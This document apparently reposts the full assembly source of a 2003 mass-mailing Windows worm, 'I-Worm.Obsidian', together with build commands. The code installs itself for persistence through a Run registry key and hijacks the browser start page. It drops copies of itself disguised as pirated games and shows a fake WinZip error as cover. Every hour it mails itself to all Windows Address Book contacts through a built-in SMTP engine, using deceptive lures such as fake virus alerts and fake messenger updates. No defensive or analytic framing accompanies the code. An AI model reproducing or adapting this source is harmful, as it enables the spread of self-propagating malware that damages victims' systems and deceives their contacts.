文章作者:Vorgon/iKX
复制内容到剪贴板
代码:
;---------------------------------------------------------------------------;
; Name: I-Worm.Obsidian@mm ;
; Author: Vorgon ;
; Size: 20480 Bytes ;
; Date: Thursday, April 10, 2003 ;
; ;
; Made in Canada ;
;---------------------------------------------------------------------------;
; ;
; DESCRIPTION: ;
; ;
; This is my first worm. It spreads using file sharing and email. When the ;
; worm is executed it copies itself to the c:\windows directory. It then ;
; adds itself to registery so it runs on start-up. The internet explorer ;
; start page is then changed to [url]www.dxgaming.com.[/url] A game is then created in ;
; the c:\my downloads directory if one does not already exist. The game to ;
; be created is based on the hour giving a possible 24 games. If the worm ;
; is executed on start-up then it stays active. Every hour it will send ;
; infected emails to everyone in the windows address book. A different ;
; email is sent for every day of the week using my own SMTP engine. ;
; ; ;
; ASSEMBLING: ;
; ;
; tasm32 /ml obsidian ;
; tlink32 -aa -x /Tpe /c obsidian,obsidian,, import32.lib,, ;
; ;
; GREETZ: ;
; ;
; T00FiC, Eddow, Asmodeus, SPTH, PakBrain, Kefi and the many people i ;
; forgot. ;
; ;
;---------------------------------------------------------------------------;
.386p
.MODEL flat, stdcall
extrn MessageBoxA : PROC
extrn GetCommandLineA : PROC
extrn CreateFileA : PROC
extrn ReadFile : PROC
extrn WriteFile : PROC
extrn SetFilePointer : PROC
extrn CloseHandle : PROC
extrn SetCurrentDirectoryA : PROC
extrn ExitProcess : PROC
extrn RegOpenKeyA : PROC
extrn RegSetvalueExA : PROC
extrn RegQueryvalueExA : PROC
extrn RegCloseKey : PROC
extrn GetSystemTime : PROC
extrn FindFirstFileA : PROC
extrn FindNextFileA : PROC
extrn FindClose : PROC
extrn Sleep : PROC
extrn lstrcpyA : PROC
extrn lstrcatA : PROC
extrn lstrlenA : PROC
extrn WSAStartup : PROC
extrn WSACleanup : PROC
extrn socket : PROC
extrn closesocket : PROC
extrn htons : PROC
extrn gethostbyname : PROC
extrn connect : PROC
extrn recv : PROC
extrn send : PROC
extrn recvfrom : PROC
extrn sendto : PROC
extrn RtlZeroMemory : PROC
extrn setsockopt : PROC
OPEN_EXISTING equ 3
CREATE_NEW equ 1
GENERIC_READ equ 80000000h
GENERIC_WRITE equ 40000000h
FILE_SHARE_READ equ 1
FILE_SHARE_WRITE equ 2
FILE_BEGIN equ 0
HKEY_LOCAL_MACHINE equ 80000002h
HKEY_CURRENT_USER equ 80000001h
REG_SZ equ 1
TRUE equ 1
FALSE equ 0
AF_INET equ 2
SOCK_STREAM equ 1
SOCK_DGRAM equ 2
PCL_NONE equ 0
DNS_TYPE_MX equ 15
DNS_TYPE_NS equ 2
DNS_CLASS_IN equ 1
SO_RCVTIMEO equ 1006h
SO_SNDTIMEO equ 1005h
SOL_SOCKET equ 0FFFFh
SOFTWARE STRUC
FileName db 50 dup(0)
FileSize dd 0
SOFTWARE ENDS
EMAIL STRUC
From db 50 dup(0)
Subject db 50 dup(0)
Message db 100 dup(0)
AttachmentName db 20 dup(0)
EMAIL ENDS
SYSTEMTIME STRUCT
wYear dw 0
wMonth dw 0
wDayOfWeek dw 0
wDay dw 0
wHour dw 0
wMinute dw 0
wSecond dw 0
wMiliseconds dw 0
SYSTEMTIME ENDS
WIN32_FIND_DATA STRUCT
FileAttributes dd 0
CreateTime dq 0
LastAccessTime dq 0
LastWriteTime dq 0
FileSizeHigh dd 0
FileSizeLow dd 0
Reserved0 dd 0
Reserved1 dd 0
FullFileName db 260 dup(0)
AlternateFileName db 14 dup(0)
WIN32_FIND_DATA ENDS
WSA_DATA STRUC
wVersion dw 0
wHighVersion dw 0
szDescription db 257 dup(0)
szSystemStatus db 129 dup(0)
iMaxSockets dw 0
iMaxUdpDg dw 0
lpVendorInfo dd 0
WSA_DATA ENDS
SOCK_ADDRESS STRUC
sin_family dw 0
sin_port dw 0
sin_addr dd 0
sin_zero db 8 dup(0)
SOCK_ADDRESS ENDS
.DATA
time SYSTEMTIME 〈0〉
win32_find_data WIN32_FIND_DATA 〈0〉
WSAData WSA_DATA 〈0〉
SockAddress SOCK_ADDRESS 〈0〉
szErrorTitle db 'WinZip Self-Extractor', 0
szErrorMessage db 'WinZip Self-Extractor header corrupt. Possible cause: bad disk or file transfer error', 0
szMaster db 'c:\WINDOWS\pcconfig.exe', 0
szStartPageKey db 'Software\Microsoft\Internet Explorer\Main', 0
szStartPageName db 'Start Page', 0
szStartPagevalue db '[url]http://www.dxgaming.com[/url]', 0
szStartUpKey db 'Software\Microsoft\Windows\CurrentVersion\Run', 0
szStartUpName db 'PC-Config32', 0
szStartUpvalue db 'C:\WINDOWS\pcconfig.exe -A', 0
szWabKey db 'Software\Microsoft\WAB\WAB4\Wab File Name', 0
szWabvalue db 256 dup(0)
szMyDownloads db 'c:\my downloads', 0
szSearchString db 'c:\my downloads\*.exe', 0
hFile dd 0
hKey dd 0
hFindFile dd 0
hSock dd 0
parameterA db FALSE
emailMessage db 4096 dup(0)
recordPosition dd 0
dataType dd 0
bufferSize dd 256
numberOfEmails dd 0
pointerToEmails dd 0
numberOfBytes dd 0
emailAddressUNI db 68 dup(0)
emailAddressASC db 34 dup(0)
helo db 'HELO vorgon.com', 13, 10
szMailFrom db 'MAIL FROM: 〈', 0
szMailTo db 'RCPT TO: 〈', 0
sendData db 'DATA', 13, 10
dot db 13, 10, '.', 13, 10
endMail db 'QUIT', 13, 10
sendBuffer db 100 dup(0)
szBracket db '〉', 13, 10, 0
szCrLf db 13, 10, 0
szDnsName db '199.166.6.2', 0
szFile db 'results.bin', 0
szQuery db 100 dup(0)
szQuery2 db 100 dup(0)
szQueryLabels db 100 dup(0)
szSMTP db 100 dup(0)
IOTimeOut dd 0
dnsBuffer db 1000 dup(0)
bytes4 db 4 dup(0)
; template for an email message with file attachment
emailP1 db 'MIME-Version: 1.0', 13, 10
db 'From: 〈', 0
emailP2 db '〉', 13, 10
db 'To: 〈', 0
emailP3 db '〉', 13, 10
db 'Subject: ', 0
emailP4 db 13, 10
db 'Content-Type: multipart/mixed; boundary=boundarystring', 13, 10, 13, 10
db 'This is a mulipart message in MIME format.', 13, 10
db '--boundarystring', 13, 10
db 'Content-Type: text/plain', 13, 10, 13, 10, 0
emailP5 db 13, 10
db '--boundarystring', 13, 10
db 'Content-Type: application; name="default.exe"', 13, 10
db 'Content-Transfer-Encoding: base64', 13, 10
db 'Content-Disposition: attachment; filename="', 0
emailP6 db '"', 13, 10, 13, 10, 0
emailP7 db 13, 10, '--boundarystring--', 13, 10, 0
softwareTable:
SOFTWARE 〈"Cossacks Full Version.exe", 0A87EC13h〉
SOFTWARE 〈"Battlefield 1942 (full).exe", 0C499913h〉
SOFTWARE 〈"Warcraft III Full.exe", 09994613h〉
SOFTWARE 〈"Jedi Knight II.exe", 0A706C13h〉
SOFTWARE 〈"Quake 3 Full Version.exe", 099C7A13h〉
SOFTWARE 〈"Starcraft full.exe", 07C83013h〉
SOFTWARE 〈"Doom 3.exe", 13D58313h〉
SOFTWARE 〈"Tribes 2 (full).exe", 104C3513h〉
SOFTWARE 〈"Rainbow 6 Full.exe", 07B8ED13h〉
SOFTWARE 〈"Oni full.exe", 0A66A813h〉
SOFTWARE 〈"White and Black.exe", 0999BB13h〉
SOFTWARE 〈"Return to Castle Wolfenstien (Full).exe", 277C5613h〉
SOFTWARE 〈"Command & Conquer: Generals.exe", 28F8BD13h〉
SOFTWARE 〈"Black Hawk Down (full).exe", 048E1313h〉
SOFTWARE 〈"The Sims: Unleashed.exe", 0A168C13h〉
SOFTWARE 〈"Age Of Mythology.exe", 165D8E13h〉
SOFTWARE 〈"Dark Age of Camelot.exe", 19775113h〉
SOFTWARE 〈"Ultima Online.exe", 1F316113h〉
SOFTWARE 〈"The Lord of the Rings.exe", 0C147F13h〉
SOFTWARE 〈"Medel Of Honor: Allied Assault.exe", 0C147F13h〉
SOFTWARE 〈"Grand Theft Auto 3 (full).exe", 08E07D13h〉
SOFTWARE 〈"Unreal 2: The Awakening (full).exe", 16A71A13h〉
SOFTWARE 〈"Unreal.exe", 0ABA1F13h〉
SOFTWARE 〈"Master Of Orion 3.exe", 03046613h〉
emailTable:
EMAIL 〈"[email]alex_p@hotmail.com[/email]",\
"So much fun",\
"This game really rocks. Play it!",\
"roadrash.exe"〉
EMAIL 〈"[email]nicolas_k@kingsnake.com[/email]",\
"I need help",\
"This game wont run properly. Does it work for you?",\
"kungfoo2.exe"〉
EMAIL 〈"[email]james_c@norton.com[/email]",\
"Virus Alert!",\
"Win32.Kiss0Death is spreading fast. Download the protection.",\
"protect.exe"〉
EMAIL 〈"[email]joice_z@cooking.com[/email]",\
"Taisty eh?",\
"Tell me if this makes your mouth water.",\
"yummy.exe"〉
EMAIL 〈"[email]momoney@cibc.com[/email]",\
"Free money",\
"Run this program and you will recieve 10 dollars a week free.",\
"money.exe"〉
EMAIL 〈"[email]msn@microsoft.com[/email]",\
"MSN Messenger Update",\
"Latest update for MSN Messenger.",\
"messenger.exe"〉
EMAIL 〈"[email]stopspam@spammers.com[/email]",\
"SPAM protection",\
"Run the program below and you will never see spam mail again.",\
"nospam.exe"〉
.DATA?
buffer db 20480 dup(?)
.CODE
Main:
;----------------------------------------------------------------------------
; Search the command line for -A
;----------------------------------------------------------------------------
call GetCommandLineA ; Get the command line
; search for a quote
mov ecx, 0
findParam:
inc ecx
cmp byte ptr [eax+ecx], 34
jne findParam
mov byte ptr [eax+ecx], 0 ; remove end quote
inc eax ; skip past the first quote
cmp word ptr [eax+ecx+1], 'A-' ; -A ?
jne copyFile
mov parameterA, TRUE
;----------------------------------------------------------------------------
; Copy self to the c:\windows directory as pcconfig.exe
;----------------------------------------------------------------------------
copyfile:
; open the current program file
call CreateFileA, eax, GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, 0, 0
mov hFile, eax
cmp eax, -1
je addToReg
; Read the program into memory
call ReadFile, hFile, offset buffer, 20480, offset numberOfBytes, 0
;close file
call CloseHandle, hFile
; create\open c:\windows\pcconfig.exe
call CreateFileA, offset szMaster, GENERIC_WRITE, FILE_SHARE_WRITE, 0, CREATE_NEW, 0, 0
mov hFile, eax
cmp eax, -1
je addToReg
; write the program in the buffer to the file
call WriteFile, hFile, offset buffer, 20480, offset numberOfBytes, 0
; close file
call CloseHandle, hFile
;----------------------------------------------------------------------------
; Add pcconfig.exe to the registry so the program runs on start-up
;----------------------------------------------------------------------------
addToReg:
call RegOpenKeyA, HKEY_LOCAL_MACHINE, offset szStartUpKey, offset hKey
cmp eax, 0
jne setStartPage
; create a value
call RegSetvalueExA, hKey, offset szStartUpName, 0, REG_SZ, offset szStartUpvalue, 0
; close key
call RegCloseKey, hKey
;----------------------------------------------------------------------------
; Change the internet explorer start page
;----------------------------------------------------------------------------
setStartPage:
call RegOpenKeyA, HKEY_CURRENT_USER, offset szStartPageKey, offset hKey
cmp eax, 0
jne endProgram
; create a value
call RegSetvalueExA, hKey, offset szStartPageName, 0, REG_SZ, offset szStartPagevalue, 0
; close key
call RegCloseKey, hKey
;----------------------------------------------------------------------------
; Create a game in the c:\my downloads directory
;----------------------------------------------------------------------------
createGame:
call CheckDirectory ; check to see if bogus software already exists
cmp eax, -1
je endProgram
xor eax, eax
mov ax, time.wHour
call CreateSoftware, eax ; Select a game to create based on the hour
;----------------------------------------------------------------------------
; Main
;----------------------------------------------------------------------------
endProgram:
cmp parameterA, TRUE
je remainActive
; display a bogus error message and exit if no -A parameter was found
call MessageBoxA, 0, offset szErrorMessage, offset szErrorTitle, 16
call ExitProcess, 0
remainActive:
call Sleep, 100 ; free up the processor time
call GetSystemTime, offset time ; get the system time
cmp time.wMinute, 1 ; try mass mailing every hour
jne remainActive
cmp time.wSecond, 1
jne remainActive
xor eax, eax
mov ax, time.wDayOfWeek
call MassMail ; select an email message to send based on the day of the week
jmp remainActive
;----------------------------------------------------------------------------
; Functions
;----------------------------------------------------------------------------
CheckDirectory PROC
;
; This function searches the c:\my downloads directory for any
; software that has already been created.
;
call FindFirstFileA, offset szSearchString, offset win32_find_data
mov hFindFile, eax
searchFiles:
mov eax, win32_find_data.FileSizeLow
cmp al, 13h
je fileFound
call FindNextFileA, hFindFile, offset win32_find_data
cmp eax, 0 ; no more exe files left?
jne searchFiles
call FindClose, hFindFile
xor eax, eax
ret
fileFound:
call FindClose, hFindFile
mov eax, -1
ret
CheckDirectory ENDP
CreateSoftware PROC softwareID:DWORD
;
; This function creates a copy of this virus in the c:\my downloads
; folder and disguises it as a piece of valid software like a
; computer game.
;
call SetCurrentDirectoryA, offset szMyDownloads
; get the address of the software record specified in softwareID
xor edx, edx
mov eax, softwareID
mov ebx, 54 ; record size
mul ebx
add eax, offset softwareTable
mov recordPosition, eax
; create the software in the c:\my downloads folder
call CreateFileA, eax, GENERIC_WRITE, FILE_SHARE_WRITE, 0, CREATE_NEW, 0, 0
mov hFile, eax
cmp eax, -1
je createFailure
; write program to file
call WriteFile, hFile, offset buffer, 20480, offset numberOfBytes, 0
; Set the filesize
mov eax, [recordPosition]
add eax, 50
mov eax, [eax]
dec eax ; eax = filesize - 1
call SetFilePointer, hFile, eax, 0, FILE_BEGIN
call WriteFile, hFile, offset buffer, 1, offset numberOfBytes, 0
; close file
call CloseHandle, hFile
xor eax, eax
ret
createFailure:
mov eax, -1
ret
CreateSoftware ENDP
MassMail PROC
;
; This function sends an email with the worm attachment to everyone
; in the windows address book.
;
; get the record position
xor edx, edx
mov ebx, 220 ; record size
mul ebx
add eax, offset emailTable
mov recordPosition, eax
; get the path of the system WAB file
call RegOpenKeyA, HKEY_CURRENT_USER, offset szWabKey, offset hKey
call RegQueryvalueExA, hKey, 0, 0, offset dataType, offset szWabvalue, offset bufferSize
call RegCloseKey, hKey
; open the WAB file
call CreateFileA, offset szWabvalue, GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, 0, 0
mov hFile, eax
cmp eax, -1
je cleanUp
; get the number of email addresses
call SetFilePointer, hFile, 64h, 0, FILE_BEGIN
call ReadFile, hFile, offset numberOfEmails, 4, offset numberOfBytes, 0
cmp numberOfEmails, 0
je cleanUp
; get the pointer to the email table
call SetFilePointer, hFile, 60h, 0, FILE_BEGIN
call ReadFile, hFile, offset pointerToEmails, 4, offset numberOfBytes, 0
; seek to the email table
call SetFilePointer, hFile, pointerToEmails, 0, FILE_BEGIN
; initialize winsock
call WSAStartup, 0101h, offset WSAData
cmp eax, 0
jne cleanUp
sendEmail:
; get an email address in its UNICODE format
call ReadFile, hFile, offset emailAddressUNI, 68, offset numberOfBytes, 0
; convert the email address to ASCII
call ConvertUniToAsc, offset emailAddressUNI, offset emailAddressASC
; get the domain name from the meail message
mov eax, offset emailAddressASC
findAt:
inc eax
cmp byte ptr [eax], '@'
jne findAt
inc eax
call lstrcpyA, offset szQuery, eax
; create the email message
call lstrcatA, offset emailMessage, offset emailP1
;append FROM email address
call lstrcatA, offset emailMessage, dword ptr [recordPosition]
call lstrcatA, offset emailMessage, offset emailP2
; append TO email address
call lstrcatA, offset emailMessage, offset emailAddressASC
call lstrcatA, offset emailMessage, offset emailP3
; append subject
mov eax, [recordPosition]
add eax, 50
call lstrcatA, offset emailMessage, eax
call lstrcatA, offset emailMessage, offset emailP4
; append message
mov eax, [recordPosition]
add eax, 100
call lstrcatA, offset emailMessage, eax
call lstrcatA, offset emailMessage, offset emailP5
; append filename
mov eax, [recordPosition]
add eax, 200
call lstrcatA, offset emailMessage, eax
call lstrcatA, offset emailMessage, offset emailP6
; get the smtp server name
mov ecx, 3
findSmtp:
push ecx
call GetSmtpDomain
pop ecx
cmp eax, 0
je foundSmtp
dec ecx
cmp ecx, 0
jne findSmtp
jmp abortSend
foundSmtp:
; connect to the email server
call ConnectToHost, offset hSock, offset szSMTP, 25, SOCK_STREAM
call TimeOut, hSock, 5000
; get response
call recv, hSock, offset sendBuffer, 100, 0
; send the HELO command
call send, hSock, offset helo, 17, 0
; get response
call recv, hSock, offset sendBuffer, 100, 0
call RtlZeroMemory, offset sendBuffer, 100
; send the MAIL FROM command
call lstrcatA, offset sendBuffer, offset szMailFrom
call lstrcatA, offset sendBuffer, dword ptr [recordPosition]
call lstrcatA, offset sendBuffer, offset szBracket
call lstrlenA, offset sendBuffer
call send, hSock, offset sendBuffer, eax, 0
; get response
call recv, hSock, offset sendBuffer, 100, 0
call RtlZeroMemory, offset sendBuffer, 100
; send the RCPT TO command
call lstrcatA, offset sendBuffer, offset szMailTo
call lstrcatA, offset sendBuffer, offset emailAddressASC
call lstrcatA, offset sendBuffer, offset szBracket
call lstrlenA, offset sendBuffer
call send, hSock, offset sendBuffer, eax, 0
; get response
call recv, hSock, offset sendBuffer, 100, 0
; send the DATA command
call send, hSock, offset sendData, 6, 0
; get response
call recv, hSock, offset sendBuffer, 100, 0
; send the message data
call lstrlenA, offset emailMessage
call send, hSock, offset emailMessage, eax, 0
; attach the worm to the email message
mov esi, offset buffer
mov ecx, 6827
attachWorm:
pusha
call Base64Encode, esi, offset bytes4
call send, hSock, offset bytes4, 4, 0
popa
add esi, 3
dec ecx
cmp ecx, 0
jne attachWorm
call send, hSock, offset emailP7, 22, 0
; send the . command
call send, hSock, offset dot, 5, 0
; get response
call recv, hSock, offset sendBuffer, 100, 0
; send the QUIT command
call send, hSock, offset endMail, 6, 0
abortSend:
call closesocket, hSock
; clear some buffers
call RtlZeroMemory, offset emailMessage, 4096
call RtlZeroMemory, offset sendBuffer, 100
call RtlZeroMemory, offset szQuery, 100
call RtlZeroMemory, offset szQuery2, 100
call RtlZeroMemory, offset szQueryLabels, 100
call RtlZeroMemory, offset szSMTP, 100
call RtlZeroMemory, offset dnsBuffer, 1000
call RtlZeroMemory, offset emailAddressASC, 34
call RtlZeroMemory, offset emailAddressUNI, 68
dec numberOfEmails
cmp numberOfEmails, 0
jne sendEmail
cleanUp:
call WSACleanup
call CloseHandle, hFile
ret
MassMail ENDP
ConvertUniToAsc PROC uniString:DWORD, ascString:DWORD
;
; This routine converts a zero terminated UNICODE string to an
; ASCII string.
;
mov esi, uniString
mov edi, ascString
convertAsc:
mov al, byte ptr [esi]
mov byte ptr [edi], al
add esi, 2
inc edi
cmp word ptr [esi], 0
jne convertAsc
ret
ConvertUniToAsc ENDP
GetSmtpDomain PROC
;
; This functions gets the domain name of a smtp server
;
; connect to the DNS server
call ConnectToHost, offset hSock, offset szDnsName, 53, SOCK_DGRAM
cmp eax, -1
je smtpFailure
call TimeOut, hSock, 5000
call StringToLabels, offset szQuery, offset szQueryLabels
call QueryDNS, hSock, offset dnsBuffer, 1000, offset szQueryLabels, DNS_TYPE_NS, DNS_CLASS_IN
cmp eax, -1
je smtpFailure
call closesocket, hSock
call lstrlenA, offset szQuery
mov edi, offset dnsBuffer
add edi, eax
add edi, 30
call GetDomainName, offset dnsBuffer, edi, offset szQuery2
call RtlZeroMemory, offset dnsBuffer, 1000
call RtlZeroMemory, offset szQueryLabels, 100
call ConnectToHost, offset hSock, offset szQuery2, 53, SOCK_DGRAM
cmp eax, -1
je smtpFailure
call TimeOut, hSock, 5000
; convert the domain name to labels
call StringToLabels, offset szQuery, offset szQueryLabels
; query the DNS server for a list of MX(mail exchage) records
call QueryDNS, hSock, offset dnsBuffer, 1000, offset szQueryLabels, DNS_TYPE_MX, DNS_CLASS_IN
cmp eax, -1
je smtpFailure
; terminate connection
call closesocket, hSock
; get the first email server name in the message
call lstrlenA, offset szQuery
mov edi, offset dnsBuffer
add edi, eax
add edi, 32
call GetDomainName, offset dnsBuffer, edi, offset szSMTP
xor eax, eax
ret
smtpFailure:
call closesocket, hSock
mov eax, -1
ret
GetSmtpDomain ENDP
GetDomainName PROC buf:DWORD, source:DWORD, dest:DWORD
;
; This function retrieves a domain name from a query message
;
mov esi, source
mov edi, dest
mov cl, [esi]
copyLabel:
inc esi
mov al, [esi]
mov [edi], al
inc edi
dec cl
cmp cl, 0
jne copyLabel
inc esi
cmp byte ptr [esi], -64
je appendLabel
cmp byte ptr [esi], 0
je domainComplete
mov cl, [esi]
mov byte ptr [edi], '.'
inc edi
jmp copyLabel
domainComplete:
xor eax, eax
ret
appendLabel:
xor eax, eax
mov al, [esi+1]
add eax, buf
mov esi, eax
mov cl, [esi]
mov byte ptr [edi], '.'
inc edi
jmp copyLabel
GetDomainName ENDP
QueryDNS PROC sock:DWORD, buf:DWORD, size:DWORD, name:DWORD, type:WORD, class:WORD
;
; This function queries a DNS server
;
; Create the query header
mov edi, offset buf
call htons, 3
mov word ptr [edi], ax ; query ID
mov word ptr [edi+2], 0 ; flags
call htons, 1
mov word ptr [edi+4], ax ; question entries
mov word ptr [edi+6], 0 ; answer entries
mov word ptr [edi+8], 0 ; authority entries
mov word ptr [edi+10], 0 ; resource entries
; copy domain name to the buffer
mov eax, buf
add eax, 12
call lstrcpyA, eax, name
; seek past the domain name
call lstrlenA, name
mov edi, buf
add edi, eax
add edi, 13
; write the query type
call htons, type
mov [edi], ax
; write the query class
call htons, class
mov [edi+2], ax
; send the query message to the DNS server
call sendto, [sock], buf, 100, 0, 0, 0
cmp eax, -1
je queryFailure
; recieve the query response
call recvfrom, [sock], buf, size, 0, 0, 0
cmp eax, -1
je queryFailure
; check to see if the query got an answer
mov edi, buf
cmp word ptr [edi+6], 0
je queryFailure
xor eax, eax
ret
queryFailure:
mov eax, -1
ret
QueryDNS ENDP
StringToLabels PROC source:DWORD, dest:DWORD
;
; This function converts a zero terminated domain name into
; a series of labels that the DNS server understands
;
mov esi, source
mov edi, dest
inc edi
xor cl, cl
mov edx, dest
findDot:
cmp byte ptr [esi], '.'
je writeTotal
cmp byte ptr [esi], 0
je convertComplete
mov al, [esi]
mov [edi], al
inc esi
inc edi
inc cl
jmp findDot
convertComplete:
mov byte ptr [edx], cl
mov edx, edi
mov byte ptr [edi], 0
ret
writeTotal:
mov byte ptr [edx], cl
xor cl, cl
mov edx, edi
inc edi
inc esi
jmp findDot
StringToLabels ENDP
ConnectToHost PROC lpSocket:DWORD, lpHostName:DWORD, port:DWORD, protocol:DWORD
;
; This function connects to a host:port
;
; Create a socket
call socket, AF_INET, protocol, PCL_NONE
mov ebx, [lpSocket]
mov [ebx], eax
cmp eax, -1
je connFailed
; Create address
mov SockAddress.sin_family, AF_INET
call htons, port
mov SockAddress.sin_port, ax
call gethostbyname, lpHostName
cmp eax, 0
je connFailed
mov eax, [eax+12]
mov eax, [eax]
mov eax, [eax]
mov SockAddress.sin_addr, eax
; connect to address
mov ebx, [lpSocket]
call connect, dword ptr [ebx], offset SockAddress, 16
cmp eax, 0
jne connFailed
; return success code
xor eax, eax
ret
connFailed:
; close the socket
mov ebx, [lpSocket]
call closesocket, dword ptr [ebx]
; return failure code
mov eax, -1
ret
ConnectToHost ENDP
TimeOut PROC sock:DWORD, milliseconds:DWORD
;
; Set the timeout for sending and recieving data
;
mov eax, milliseconds
mov IOTimeOut, eax
call setsockopt, sock, SOL_SOCKET, SO_RCVTIMEO, offset IOTimeOut, 4
call setsockopt, sock, SOL_SOCKET, SO_SNDTIMEO, offset IOTimeOut, 4
ret
TimeOut ENDP
Base64Encode PROC threeBytes:DWORD, fourBytes:DWORD
;
; Converts 3 ASCII bytes to 4 Base64 encoded bytes
;
mov esi, threeBytes
mov edi, fourBytes
; reverse the byte order
mov al, [esi+2]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi]
mov [edi+2], al
mov byte ptr [edi+3], 0
mov eax, [edi]
; convert first 6 bits
push eax
and eax, 0FC0000h
shr eax, 18
call addBase
mov [edi], al
pop eax
; convert second 6 bits
push eax
and eax, 3F000h
shr eax, 12
call addBase
mov [edi+1], al
pop eax
; convert third 6 bits
push eax
and eax, 0FC0h
shr eax, 6
call addBase
mov [edi+2], al
pop eax
; convert forth 6 bits
push eax
and eax, 3Fh
call addBase
mov [edi+3], al
pop eax
ret
addBase:
cmp al, 25
jle add65
cmp al, 51
jle add71
cmp al, 61
jle sub4
cmp al, 62
je mov43
cmp al, 63
jmp mov47
add65: add al, 65
ret 0
add71: add al, 71
ret 0
sub4: sub al, 4
ret 0
mov43: mov al, 43
ret 0
mov47: mov al, 47
ret 0
Base64Encode ENDP
End Main ; End of code
